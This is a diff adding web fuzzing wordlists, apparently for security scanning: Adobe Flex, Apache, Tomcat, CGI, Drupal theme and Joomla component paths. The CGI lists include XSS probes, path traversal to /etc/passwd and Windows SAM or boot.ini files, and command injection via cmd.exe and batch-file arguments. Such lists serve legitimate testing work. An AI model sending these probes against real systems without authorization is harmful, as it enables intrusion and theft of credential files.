Many additions to the repository...

Discovery/AdobeXML.fuzz.txt

@@ -0,0 +1,16 @@
+/flex2gateway/
+/flex2gateway/http
+/flex2gateway/httpsecure
+/flex2gateway/cfamfpoolling
+/flex2gateway/amf
+/flex2gateway/amfpolling
+/messagebroker/http
+/messagebroker/httpsecure
+/blazeds/messagebroker/http
+/blazeds/messagebroker/httpsecure
+/samples/messagebroker/http
+/samples/messagebroker/httpsecure
+/lcds/messagebroker/http
+/lcds/messagebroker/httpsecure
+/lcds-samples/messagebroker/http
+/lcds-samples/messagebroker/httpsecure

Discovery/Apache.fuzz.txt

@@ -0,0 +1,43 @@
+/.htaccess
+/.htaccess.bak
+/.htpasswd
+/.meta
+/.web
+/apache/logs/access.log 
+/apache/logs/access_log
+/apache/logs/error.log 
+/apache/logs/error_log
+/httpd/logs/access.log 
+/httpd/logs/access_log
+/httpd/logs/error.log 
+/httpd/logs/error_log
+/logs/access.log
+/logs/access.log 
+/logs/error.log 
+/logs/error_log
+/access_log
+/cgi
+/cgi-bin
+/cgi-pub
+/cgi-script
+/dummy
+/error
+/error_log
+/htdocs
+/httpd
+/httpd.pid
+/icons
+/index.html
+/logs
+/manual
+/phf
+/printenv
+/server-info
+/server-status
+/status
+/test-cgi
+/tmp
+/~bin
+/~ftp
+/~nobody
+/~root

Discovery/ApacheTomcat.fuzz.txt

@@ -0,0 +1,46 @@
+/examples
+/examples/jsp/index.html
+/examples/jsp/snp/snoop.jsp
+/examples/jsp/source.jsp
+/examples/servlet/HelloWorldExample
+/examples/servlet/SnoopServlet
+/examples/servlet/TroubleShooter
+/examples/servlet/default/jsp/snp/snoop.jsp
+/examples/servlet/default/jsp/source.jsp
+/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
+/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
+/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
+/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
+/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
+/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
+/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
+/examples/servlet/snoop
+/examples/servlets/index.html
+/jsp-examples
+/manager
+/manager/deploy?path=foo
+/manager/html/
+/servlet/default/
+/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
+/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
+/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
+/servlet/org.apache.catalina.servlets.DefaultServlet/
+/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
+/servlet/org.apache.catalina.servlets.HTMLManagerServlet
+/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
+/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
+/servlet/org.apache.catalina.servlets.ManagerServlet
+/servlet/org.apache.catalina.servlets.SnoopAllServlet
+/servlet/org.apache.catalina.servlets.WebdavServlet/
+/tomcat-docs
+/webdav
+/webdav/index.html
+/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
+/webdav/servlet/webdav/
+/conf/
+/conf/server.xml/
+/WEB-INF/
+/WEB-INF/web.xml
+/WEB-INF/classes/
+/shared/
+/shared/lib/

Discovery/CGI_HTTP_POST.fuzz.txt

@@ -0,0 +1,7 @@
+post-query
+Config1.htm
+My_eGallery/public/displayCategory.php
+servlet/custMsg?guestName=<script>alert(document.cookie)(\
+servlet/CookieExample?cookiename=<script>alert(document.cookie)(\
+lastlines.cgi?process
+Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000

Discovery/CGI_HTTP_POST_Windows.fuzz.txt

@@ -0,0 +1,6 @@
+_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
+_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
+admin/db.php
+_vti_bin/shtml.dll/_vti_rpc

Discovery/CGI_Microsoft.fuzz.txt

@@ -0,0 +1,79 @@
+# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.
+/cart32.exe
+/get32.exe
+/visadmin.exe
+/foxweb.exe
+/webplus.exe?about
+/fpsrvadm.exe
+/MsmMask.exe
+/cmd.exe?/c+dir
+/cmd1.exe?/c+dir
+/post32.exe|dir%20c:\\
+/cgitest.exe
+/hpnst.exe?c=p+i=
+/Pbcgi.exe
+/testcgi.exe
+/webfind.exe?keywords=01234567890123456789
+/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
+/test-cgi.exe?<script>alert(document.cookie)</script>
+/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+/mkilog.exe
+/mkplog.exe
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/perl.exe?-v
+/perl.exe
+/ppdscgi.exe
+/c32web.exe/ChangeAdminPassword
+/windmail.exe
+/dbmlparser.exe
+/cgimail.exe
+/minimal.exe
+/rguest.exe
+/visitor.exe
+/webbbs.exe
+/wguest.exe
+//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
+/cfgwiz.exe
+/Cgitest.exe
+/mailform.exe
+/post16.exe
+/imagemap.exe
+/htimage.exe/path/filename?2,2
+/htimage.exe
+/Webnews.exe
+/texis.exe/junk
+/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+/sensepost.exe?/c+dir
+/testcgi.exe
+/testcgi.exe?<script>alert(document.cookie)</script>
+/ion-p.exe?page=c:\winnt\repair\sam
+/../../../../../../../../../../WINNT/system32/ipconfig.exe
+/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
+/foxweb.dll
+/wconsole.dll
+/shtml.dll
+/scripts/slxweb.dll/getfile?type=Library&file=[invalid
+/filename]
+/rightfax/fuwww.dll/?
+/WINDMAIL.EXE?%20-n%20c:\boot.ini%
+/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
+/GW5/GWWEB.EXE
+/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+/GW5/GWWEB.EXE?HELP=bad-request
+/GWWEB.EXE?HELP=bad-request
+/echo.bat
+/echo.bat?&dir+c:\\
+/hello.bat?&dir+c:\\
+/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+/input2.bat?|dir
+/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+/test-cgi.bat
+/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

Discovery/CMS/drupal_themes.fuzz.txt

@@ -0,0 +1,828 @@
+themes/001%20Dev%20Skin/
+themes/001_dev_skin/
+themes/002_dev_skin/
+themes/08paros/
+themes/1024px/
+themes/4_of_July/
+themes/Aeon5/
+themes/Alina/
+themes/Amare/
+themes/Amor_Azul/
+themes/Andreas1024px/
+themes/Autumn/
+themes/B7/
+themes/BlueSquare/
+themes/Bonsai/
+themes/Bubbles/
+themes/ChaiGaram/
+themes/Colorart/
+themes/CristalX4Drupal/
+themes/DrupalRefresh/
+themes/DuoFertility/
+themes/Earth_birthday/
+themes/Fall/
+themes/Grassroutes/
+themes/HWCTravel/
+themes/Internet_Broadcast/
+themes/Internet_Corporation/
+themes/July4/
+themes/Kyrgyzstan/
+themes/MyDrupal-Tidy/
+themes/MyDrupal/
+themes/MyDrupal_Impact/
+themes/MyDrupal_Universal/
+themes/MyTree/
+themes/NukeNews/
+themes/Odeta/
+themes/Pixeled/
+themes/Plain1/
+themes/Pleroma/
+themes/Purple_Beauty/
+themes/SEOposition/
+themes/SHINOBI/
+themes/SanQReLl/
+themes/SkyLine/
+themes/Stasis/
+themes/SynFox/
+themes/TVframe/
+themes/Tendu/
+themes/XTemplate_Tableless/
+themes/a-cloudy-day/
+themes/a3_atlantis/
+themes/aBeesParadise/
+themes/abac/
+themes/abaca/
+themes/abarre/
+themes/aberdeen/
+themes/abessive/
+themes/ability/
+themes/ablaze/
+themes/ablock/
+themes/ablogtheme/
+themes/aboutpeople/
+themes/absolution/
+themes/abstract/
+themes/absynthe/
+themes/abundant/
+themes/aclide/
+themes/acoldday/
+themes/acquia_marina/
+themes/acquia_prosper/
+themes/acquia_slate/
+themes/acrylic/
+themes/acta/
+themes/active_n_rebuild/
+themes/activesigns/
+themes/activesite/
+themes/ad_agency/
+themes/ad_blueprint/
+themes/ad_lemon-twist/
+themes/ad_novus/
+themes/ad_redoable/
+themes/ad_the-morning-after/
+themes/adaptivetheme/
+themes/adaptivetheme_mobile/
+themes/adarkproxisstheme/
+themes/adc/
+themes/addari/
+themes/adm_like_xp/
+themes/admire-gray/
+themes/admire-navy/
+themes/admire-orange/
+themes/admire_gray/
+themes/admire_grunge/
+themes/adt_basetheme/
+themes/adt_webapplication/
+themes/affaires/
+themes/agregado/
+themes/agua/
+themes/airyblue/
+themes/alchemist/
+themes/alek_2_0/
+themes/algaglas/
+themes/alina/
+themes/almaw/
+themes/alpha/
+themes/alphorn/
+themes/amadou/
+themes/amity_island/
+themes/analytic/
+themes/andreas/
+themes/andreas00/
+themes/andreas01/
+themes/andreas02/
+themes/andreas03/
+themes/andreas04/
+themes/andreas05/
+themes/andreas06/
+themes/andreas07/
+themes/andreas08/
+themes/andreas09/
+themes/andreas1_tal/
+themes/anitakravitz/
+themes/antique_modern/
+themes/appleweb/
+themes/aqua_fish/
+themes/aquanaut/
+themes/aquasoft/
+themes/arclitetheme/
+themes/arcmateria/
+themes/argeebee/
+themes/art4-blue/
+themes/art4_blue/
+themes/art4_green/
+themes/arthemia/
+themes/artistsC01/
+themes/artschool/
+themes/artsy/
+themes/async/
+themes/at_koda/
+themes/at_panels_everywhere/
+themes/atck/
+themes/atrium_simple/
+themes/aurora/
+themes/austere/
+themes/austin/
+themes/autumn_almanac/
+themes/awesome/
+themes/ax/
+themes/ax_clean/
+themes/barlow/
+themes/barron/
+themes/bartik/
+themes/base/
+themes/base_theme/
+themes/baseline/
+themes/baselinecss/
+themes/basic/
+themes/basic_sass/
+themes/basketball/
+themes/beach/
+themes/beat/
+themes/beginning/
+themes/beginningW2/
+themes/berylizer/
+themes/bidi/
+themes/biz/
+themes/black_getsred/
+themes/black_mamba/
+themes/blackout/
+themes/blackpark/
+themes/blackprak/
+themes/blank/
+themes/bleech/
+themes/blix/
+themes/blogbuzz/
+themes/bloggrail/
+themes/blogsmith/
+themes/blommor01/
+themes/blossom/
+themes/blue_bars/
+themes/blue_zinfandel/
+themes/blueberryboat/
+themes/bluebreeze/
+themes/bluecitron/
+themes/bluecurve/
+themes/bluefire/
+themes/bluefreedom/
+themes/bluefun/
+themes/bluefx/
+themes/blueish/
+themes/bluelake/
+themes/bluemarine
+themes/bluemarine/
+themes/bluemarine_ets/
+themes/bluemarine_smarty/
+themes/bluenile/
+themes/blueprint/
+themes/bluerobot/
+themes/bluerobot2/
+themes/bluespan/
+themes/bluetrip/
+themes/bluezone/
+themes/bookstore/
+themes/box_grey/
+themes/box_grey_rtl/
+themes/box_grey_smarty/
+themes/brainstorm/
+themes/brooklyn/
+themes/browntown/
+themes/browny/
+themes/brushed_steel/
+themes/bubbles/
+themes/burnt/
+themes/burnt_rubber/
+themes/busy/
+themes/bz_lite/
+themes/camaxtli/
+themes/camsel/
+themes/candy_corn/
+themes/candy_corn_rtl/
+themes/cdmug/
+themes/celadon/
+themes/celestial/
+themes/celju/
+themes/cgiirc/
+themes/chameleon
+themes/chameleon/
+themes/chamfer/
+themes/changeme/
+themes/channel_nine/
+themes/charity/
+themes/cherryblossom/
+themes/chiquechick/
+themes/chitown/
+themes/choclatebrown/
+themes/chocotheme/
+themes/chrono/
+themes/chrysalis/
+themes/civicspace/
+themes/clean-a/
+themes/clean/
+themes/cleanfolio/
+themes/cleanr/
+themes/cleanslate/
+themes/cleanstate/
+themes/clear_dark/
+themes/clearblue/
+themes/clearlooks/
+themes/clementine/
+themes/cms-theme/
+themes/cod_organizing/
+themes/collab/
+themes/colorcss/
+themes/colorfulness/
+themes/colorfulness_theme/
+themes/colorpaper/
+themes/colourise/
+themes/combustion/
+themes/compact_lime/
+themes/conch/
+themes/conference/
+themes/connections/
+themes/console/
+themes/contented7/
+themes/contrast/
+themes/contributions/
+themes/coolwater/
+themes/coolweb/
+themes/copyblogger/
+themes/corolla/
+themes/crusti/
+themes/crystalxl/
+themes/csszg/
+themes/cti_flex/
+themes/cws/
+themes/d4rk/
+themes/d7ux/
+themes/daleri-structure/
+themes/dance/
+themes/danger4k/
+themes/danland/
+themes/dark/
+themes/darkblue/
+themes/darkelegance/
+themes/darkgrail/
+themes/darkgreen/
+themes/darsch/
+themes/decayed/
+themes/deco/
+themes/delicious_fruit/
+themes/deliciously_blue/
+themes/delocalized/
+themes/democratica/
+themes/denver/
+themes/dessert/
+themes/devavrata_free_bare/
+themes/diary/
+themes/dichotomy/
+themes/dingus/
+themes/dotted/
+themes/dovetail/
+themes/dreamy/
+themes/dropshadow/
+themes/drucer/
+themes/drupal-de-1/
+themes/drupalui/
+themes/drupazine/
+themes/drupera/
+themes/drupify/
+themes/dusky/
+themes/earthen/
+themes/earthish/
+themes/easybreeze/
+themes/ebizon_exotic_red/
+themes/ebizon_redfire/
+themes/ecobusiness/
+themes/eldir/
+themes/elegant/
+themes/elements_theme/
+themes/emspace_2007/
+themes/emspace_basic/
+themes/energetic/
+themes/enlight/
+themes/eponymous/
+themes/equalizer/
+themes/erp_theme/
+themes/eve_igb/
+themes/evening/
+themes/exquisite/
+themes/extended/
+themes/fadethingee/
+themes/fall/
+themes/fancy/
+themes/fancy_rtl/
+themes/fblike/
+themes/fern/
+themes/fervens/
+themes/fields/
+themes/fields_2009/
+themes/filmforge_theme/
+themes/fireflystreamcom/
+themes/five/
+themes/five_blog/
+themes/fiveseasons/
+themes/flatforum/
+themes/flattering/
+themes/flexible/
+themes/flexlogin/
+themes/fluid/
+themes/fluidgrid/
+themes/foliage/
+themes/forest_floor/
+themes/foundation/
+themes/fourseasons/
+themes/fourseasonsDRUPAL-6/
+themes/framework/
+themes/freeradicals/
+themes/freestyle/
+themes/fresh_media/
+themes/friendselectric/
+themes/friendsforever/
+themes/frisbee/
+themes/fruity/
+themes/fueldeluxe/
+themes/fusion/
+themes/fusiontheme/
+themes/gagarin/
+themes/garamond/
+themes/gardening/
+themes/garland
+themes/garland-smarty/
+themes/garland/
+themes/garlandrtl/
+themes/gateway/
+themes/gbif/
+themes/generic/
+themes/genesis/
+themes/genesis_LITE/
+themes/genesis_coldday/
+themes/genesis_darkmatter/
+themes/genesis_typo1/
+themes/genesis_webify/
+themes/genesis_webx/
+themes/genesis_zine/
+themes/german_newspaper/
+themes/gespaa/
+themes/global/
+themes/glorillacomtheme/
+themes/glossyblue/
+themes/golden_hour/
+themes/goldengray/
+themes/goldfish/
+themes/gommutheme/
+themes/goofy
+themes/goofy/
+themes/grass/
+themes/grassland/
+themes/green/
+themes/greenNblack/
+themes/greenhouse/
+themes/greenmarinee/
+themes/greenpark/
+themes/greens/
+themes/greenthing/
+themes/greeny_blu/
+themes/grid_inspired/
+themes/gulmohar/
+themes/gunmetal/
+themes/gutenberg/
+themes/gworks/
+themes/happypixels/
+themes/hariyali/
+themes/helvetica/
+themes/hexagon/
+themes/hiroshige/
+themes/hiroshigeblue/
+themes/holygrail/
+themes/hopestation/
+themes/htmlzero/
+themes/hunchbaque/
+themes/hydra/
+themes/hyperglass/
+themes/iTheme2/
+themes/icandy/
+themes/icons/
+themes/id-facta/
+themes/idrupal_ui/
+themes/idthemes/
+themes/ifeeldirty/
+themes/igniter/
+themes/illusion/
+themes/images/
+themes/imagination/
+themes/img/
+themes/industrial/
+themes/inf08/
+themes/inkribbon/
+themes/inove/
+themes/insanitarium/
+themes/integral/
+themes/interactive_media/
+themes/interlaced/
+themes/internet_center/
+themes/internet_jobs/
+themes/internet_music/
+themes/internet_services/
+themes/internet_services_rtl/
+themes/internetservices/
+themes/inva/
+themes/iron/
+themes/ishalist/
+themes/itheme/
+themes/iui/
+themes/ivy/
+themes/iwebkit/
+themes/jaded/
+themes/jeroen
+themes/jeroen/
+themes/jesox_mmozine/
+themes/joker/
+themes/jp_mobile/
+themes/jq4dat/
+themes/jq_theme/
+themes/jqtouch/
+themes/juventus/
+themes/k2/
+themes/k2_smarty/
+themes/keepitsimple/
+themes/kexolid/
+themes/koi/
+themes/kommunity/
+themes/kubrick/
+themes/larepublique/
+themes/launchpad/
+themes/layoutstudio/
+themes/leaf/
+themes/leaf_smarty/
+themes/leaves/
+themes/lemontwist/
+themes/lichtgestalt/
+themes/light/
+themes/light_and_simple_blues/
+themes/light_brown/
+themes/lightfantastic/
+themes/lightgreen/
+themes/lincolns_revenge/
+themes/linkit/
+themes/litejazz/
+themes/lumen/
+themes/magazeen/
+themes/magwood/
+themes/manage-theme/
+themes/manage/
+themes/manji/
+themes/manollio_rtl/
+themes/manuscript/
+themes/marinelli/
+themes/marketplace/
+themes/marketstate/
+themes/marvin
+themes/marvin/
+themes/marvin_2k/
+themes/marvin_2k_phptemplate/
+themes/marvinclassic/
+themes/mediarevolution/
+themes/meta/
+themes/millwood/
+themes/mini_blog/
+themes/minimalist/
+themes/mistylook/
+themes/mobi/
+themes/mobile/
+themes/mobile_garland/
+themes/modernbird/
+themes/modules/
+themes/moleskine/
+themes/mollio/
+themes/mondrian/
+themes/monochrome/
+themes/moshpit/
+themes/mothership/
+themes/motion/
+themes/mpFREE/
+themes/mt/
+themes/mulpo/
+themes/multiflex/
+themes/multiflex21/
+themes/multiflex3/
+themes/multiflex37/
+themes/musicdj/
+themes/mydrupal_impact5/
+themes/mystique/
+themes/n_rebuild/
+themes/n_rebuild_2/
+themes/n_rebuild_3/
+themes/nautica05/
+themes/nautica09/
+themes/neewee/
+themes/nerdalistic/
+themes/new-abundant/
+themes/newfangled/
+themes/newhorizon/
+themes/newsflash/
+themes/newskin/
+themes/newsportal/
+themes/newsportal02/
+themes/newswire/
+themes/ngp/
+themes/nifty50/
+themes/niftyCorners/
+themes/nifty_drupal/
+themes/nigraphic/
+themes/ninesixty/
+themes/ninesixtyfluid/
+themes/ninesixtyrobots/
+themes/nirvana/
+themes/nirvana_fluid/
+themes/nista/
+themes/nitobe/
+themes/nixer/
+themes/nokia_mobile/
+themes/nokoala/
+themes/nonzero/
+themes/nonzerored/
+themes/noprob/
+themes/notechaos/
+themes/nothing/
+themes/obsidian/
+themes/ocadia/
+themes/occy/
+themes/offline/
+themes/olav/
+themes/omega/
+themes/oocss/
+themes/openpublish_theme/
+themes/orange-mint/
+themes/orange/
+themes/oranzh/
+themes/orchard/
+themes/osmobi-mobile/
+themes/oxidation/
+themes/painted/
+themes/panany/
+themes/panels_960gs/
+themes/paper/
+themes/paradise/
+themes/pearls/
+themes/persian/
+themes/personal/
+themes/pgtheme/
+themes/philarts_theme2/
+themes/phpbb3/
+themes/phptemplate/
+themes/pinkish/
+themes/pinkribbon/
+themes/pinstripes/
+themes/pixel/
+themes/pixture/
+themes/pixture_reloaded/
+themes/plain/
+themes/plain2/
+themes/plaingrail/
+themes/plainscape/
+themes/pluralism/
+themes/plutado/
+themes/plutado_blue/
+themes/plutado_green/
+themes/plutado_grey/
+themes/plutado_red/
+themes/plutado_wide/
+themes/pockett/
+themes/polder/
+themes/polpo/
+themes/portal_blue/
+themes/powerfulpink/
+themes/professional/
+themes/protocons/
+themes/purple_beauty/
+themes/purple_box/
+themes/pushbutton
+themes/pushbutton/
+themes/pushbutton_phptemplate/
+themes/quicksilver/
+themes/radiant/
+themes/ramadan/
+themes/ranch/
+themes/raw/
+themes/rdc/
+themes/recycled/
+themes/red_ruby/
+themes/redhot/
+themes/reflection/
+themes/reflek/
+themes/refresco/
+themes/refresh/
+themes/relax/
+themes/renecance/
+themes/retroadmin/
+themes/rezina/
+themes/riebel/
+themes/rootcandy/
+themes/roundness/
+themes/royal/
+themes/salamander-6/
+themes/salamander/
+themes/salamanderskins/
+themes/sandbox-theme/
+themes/sandium/
+themes/sands/
+themes/sands_css/
+themes/sandtiger/
+themes/sanqreal/
+themes/sapo/
+themes/scaccarium/
+themes/scratch/
+themes/scribbish/
+themes/scruffy-desk/
+themes/scruffy/
+themes/sea_breeze/
+themes/seanr_xhtml/
+themes/seven
+themes/seven/
+themes/shakennotstirred/
+themes/shallowgrunge/
+themes/shampoo/
+themes/sharepoint-like/
+themes/shopwindow/
+themes/sib/
+themes/siberia/
+themes/simpla/
+themes/simple/
+themes/simple_blog/
+themes/simple_web/
+themes/simplefolio/
+themes/simpler/
+themes/simplex/
+themes/simplex2/
+themes/simplicity/
+themes/simply_modern/
+themes/simplygreen/
+themes/sinatra/
+themes/sitebrowser_basic/
+themes/sk8/
+themes/sketchit/
+themes/sky/
+themes/skyline/
+themes/skyliner/
+themes/skymod/
+themes/skyroots/
+themes/slash/
+themes/slashin/
+themes/slate
+themes/slate/
+themes/slurpee/
+themes/smarty/
+themes/smashing_dilectio/
+themes/smoothBlue/
+themes/smooth_blue/
+themes/snd/
+themes/soccer/
+themes/social/
+themes/sodelicious/
+themes/softwhite/
+themes/solarflare/
+themes/soldier/
+themes/solemnity/
+themes/solon/
+themes/somethingspecial/
+themes/sonbol/
+themes/sor/
+themes/splender/
+themes/spooner/
+themes/sports/
+themes/spreadfirefox/
+themes/spring/
+themes/spring_bloom/
+themes/spring_theme/
+themes/stark
+themes/stark/
+themes/starkish/
+themes/stilton/
+themes/strange_little_town/
+themes/strix/
+themes/studio/
+themes/stylebox/
+themes/styleswitcher/
+themes/stylized_beauty/
+themes/summerholiday/
+themes/summertime/
+themes/sunflower/
+themes/sunny_sky/
+themes/sunset/
+themes/superclean/
+themes/supriya/
+themes/surface/
+themes/sussex/
+themes/sweethome/
+themes/sympal_theme/
+themes/synfox/
+themes/tableless/
+themes/tal_grey/
+themes/tapestry/
+themes/tarski/
+themes/tattler_theme/
+themes/tech/
+themes/teh/
+themes/teleology/
+themes/templist/
+themes/tendu/
+themes/terrafirma/
+themes/terrafirma_theme/
+themes/test/
+themes/texas/
+themes/themename/
+themes/themes/
+themes/themetastic/
+themes/thirteen/
+themes/tinsel/
+themes/tivity/
+themes/tma/
+themes/toasted/
+themes/touch/
+themes/tranquility/
+themes/travel/
+themes/treedesert/
+themes/trillian
+themes/trillian/
+themes/trip/
+themes/triumviratum/
+themes/turquoise/
+themes/twilight/
+themes/twittish/
+themes/typography_paramount/
+themes/typoversicol/
+themes/ubiquity/
+themes/udtheme/
+themes/ufutbol/
+themes/ultimate960/
+themes/uncomplicated/
+themes/unconed
+themes/unconed/
+themes/untheme/
+themes/unthemes/
+themes/vertigo/
+themes/vigilianty/
+themes/vineyard/
+themes/vitzo/
+themes/vitzo_flex/
+themes/voodoo/
+themes/voodoo_dolly/
+themes/votebob/
+themes/wabi/
+themes/waffles/
+themes/wall/
+themes/warmy/
+themes/warped/
+themes/web110/
+themes/webchick/
+themes/wgbluemarine/
+themes/whatsinitsname/
+themes/whatsyoursolution/
+themes/wilderness/
+themes/winter_wonderland/
+themes/wireframe/
+themes/wowtheme/
+themes/wyo/
+themes/xsilver/
+themes/xtemplate/
+themes/xwebAeon4/
+themes/yaroon
+themes/yaroon/
+themes/yarooned/
+themes/yast/
+themes/yui-framework/
+themes/yui/
+themes/yui_grid/
+themes/zen/
+themes/zen_basic/
+themes/zen_deleon2/
+themes/zen_midnight/
+themes/zen_ninesixty/
+themes/zen_twilight/
+themes/zenland/
+themes/zental/
+themes/zenzen/
+themes/zeropoint/
+themes/zilo_blog/
+themes/zubrick/

Discovery/CMS/joomla_plugins.fuzz.txt

@@ -0,0 +1,224 @@
+components/com_acajoom/
+components/com_aclassf/
+components/com_acmisc/
+components/com_adsmanager/
+components/com_agora/
+components/com_ajaxchat/
+components/com_akogallery/
+components/com_album/
+components/com_allvideosreloaded/
+components/com_alphauserpoints/
+components/com_aprice/
+components/com_artportal/
+components/com_avreloaded/
+components/com_banners/
+components/com_bfsurvey_basic/
+components/com_booklibrary/
+components/com_bookmarks/
+components/com_carman/
+components/com_cartikads/
+components/com_casino/
+components/com_cbresumebuilder/
+components/com_chatroom/
+components/com_ckforms/
+components/com_comment/
+components/com_comprofiler/
+components/com_contact/
+components/com_contactus/
+components/com_content/
+components/com_ContentBlogList/
+components/com_cronjobs/
+components/com_customquickicons/
+components/com_dhforum/
+components/com_digifolio/
+components/com_digistore/
+components/com_djcatalog/
+components/com_dm_orders/
+components/com_docman/
+components/com_doqment/
+components/com_easygallery/
+components/com_easygb/
+components/com_easygb2/
+components/com_eventlist/
+components/com_events/
+components/com_extplorer/
+components/com_ezine/
+components/com_ezrealty/
+components/com_facebook/
+components/com_facileforms/
+components/com_fastball/
+components/com_favourites/
+components/com_fireboard/
+components/com_flickr4j/
+components/com_foobla_suggestions/
+components/com_form/
+components/com_forum/
+components/com_frontpage/
+components/com_games/
+components/com_gameserver/
+components/com_gcalendar/
+components/com_groups/
+components/com_hbssearch/
+components/com_hiscat/
+components/com_icrmbasic/
+components/com_idoblog/
+components/com_intuit/
+components/com_intuitLocal/
+components/com_invite/
+components/com_jabode/
+components/com_jbook/
+components/com_jbudgetsmagic/
+components/com_jcalpro/
+components/com_jce/
+components/com_jcomments/
+components/com_jeemaarticlecollection/
+components/com_jinc/
+components/com_jmovies/
+components/com_job/
+components/com_jomcomment/
+components/com_joomap/
+components/com_joomfish/
+components/com_joomlapack/
+components/com_joomlastats/
+components/com_joomlaxplorer/
+components/com_joomportfolio/
+components/com_joomunity/
+components/com_j-projects/
+components/com_jreservation/
+components/com_jshop/
+components/com_jsjobs/
+components/com_jtips/
+components/com_juser/
+components/com_kide/
+components/com_letterman/
+components/com_livechat/
+components/com_login/
+components/com_mailto/
+components/com_media/
+components/com_messages/
+components/com_messenger/
+components/com_Mochigames/
+components/com_morfeoshow/
+components/com_moschat/
+components/com_mosres/
+components/com_mytube/
+components/com_network/
+components/com_newsfeeds/
+components/com_ninjacentral/
+components/com_omphotogallery/
+components/com_oprykningspoint_mc/
+components/com_otzivi/
+components/com_page/
+components/com_parainvite/
+components/com_paxxgallery/
+components/com_perchagallery/
+components/com_personel/
+components/com_photo/
+components/com_photoblog/
+components/com_places/
+components/com_poll/
+components/com_ponygallery/
+components/com_privmsgs/
+components/com_proofreader/
+components/com_qcache/
+components/com_rate/
+components/com_rating/
+components/com_registration/
+components/com_rsform/
+components/com_rsgallery2/
+components/com_rss/
+components/com_schools/
+components/com_search/
+components/com_sef/
+components/com_sef/     
+components/com_seminar/
+components/com_seyret/
+components/com_shoutbox/
+components/com_siirler/
+components/com_simple_review/
+components/com_simpleshop/
+components/com_sobi2/
+components/com_soundset/
+components/com_sportfusion/
+components/com_store/
+components/com_subscribe/
+components/com_surveymanager/
+components/com_swmenufree/
+components/com_thumbnailpro/
+components/com_tpjobs/
+components/com_trabalhe_conosco/
+components/com_tupinambis/
+components/com_user/
+components/com_users/
+components/com_virtualkiss/
+components/com_virtuemart/
+components/com_vxdate/
+components/com_webcamxp/
+components/com_weblinks/
+components/com_weblogs/
+components/com_wrapper/
+components/com_wrapper/ 
+components/com_wrapper/  
+components/com_xmap/       
+components/com_zcalendar/
+components/js_relevant/
+modules/mod_adscroller/
+modules/mod_archive/
+modules/mod_articles_archive/
+modules/mod_articles_category/
+modules/mod_articles_latest/
+modules/mod_articles_news/
+modules/mod_articles_popular/
+modules/mod_banners/
+modules/mod_breadcrumbs/
+modules/mod_briaskISS/
+modules/mod_ccnewsletter/
+modules/mod_custom/
+modules/mod_dn/
+modules/mod_feed/
+modules/mod_filterednews/
+modules/mod_flashmod/
+modules/mod_footer/
+modules/mod_forme/
+modules/mod_gk_news_image/
+modules/mod_internetradio/
+modules/mod_internetradio2/
+modules/mod_jabulletin/ 
+modules/mod_janewsflash/
+modules/mod_ja_slwi/
+modules/mod_jms_support/
+modules/mod_latestnews/
+modules/mod_login/
+modules/mod_mainmenu/
+modules/mod_menu/
+modules/mod_minifrontpage/
+modules/mod_mostread/
+modules/mod_newsflash/
+modules/mod_onlineusers/
+modules/mod_onlineusers_pro/
+modules/mod_poll/
+modules/mod_product_categories/
+modules/mod_productscroller/
+modules/mod_random_image/
+modules/mod_related_items/
+modules/mod_rokslideshow/
+modules/mod_rsform/
+modules/mod_search/
+modules/mod_sections/
+modules/mod_skychat/
+modules/mod_sobi2simplefeatured/
+modules/mod_sobidropdown/
